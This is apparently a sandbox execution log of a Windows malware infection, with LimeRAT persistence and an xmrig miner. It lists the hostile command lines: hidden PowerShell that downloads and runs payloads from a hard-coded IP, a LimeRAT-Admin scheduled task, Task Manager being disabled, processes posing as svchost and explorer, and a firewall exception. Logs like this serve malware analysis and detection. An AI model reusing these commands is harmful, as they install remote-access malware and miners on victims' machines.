wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\java.vbs"
3236
WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
8152
taskkill.exe taskkill /F /IM xmrig.exe
5888
WMIC.exe wmic process where name='xmrig.exe' delete
8084
PING.EXE ping 127.0.0.1 -n 5
4884
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\upd3.vbs"
5168
WMIC.exe wmic process where name='taskmgr.exe' delete
2340
WMIC.exe wmic process where name='Taskmgr.exe' delete
3932
WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
3004
reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
9060
PING.EXE ping 127.0.0.1 -n 5
3252
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\1a2.vbs"
3464
svchost.exe "C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe"
6872
schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe'"
1636
svchost.exe "C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe"
2620
powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
4560
win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
6408
powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
1844
explorer.exe "C:\Windows (x86)\explorer.exe"
4156
PING.EXE ping 127.0.0.1 -n 90
4568
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\z.vbs"
2456
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
6120
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs"
7460
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
1808
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\1234.bat"
3356
PING.EXE ping 127.0.0.1 -n 5
7076
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat"
6584
netsh.exe netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
7080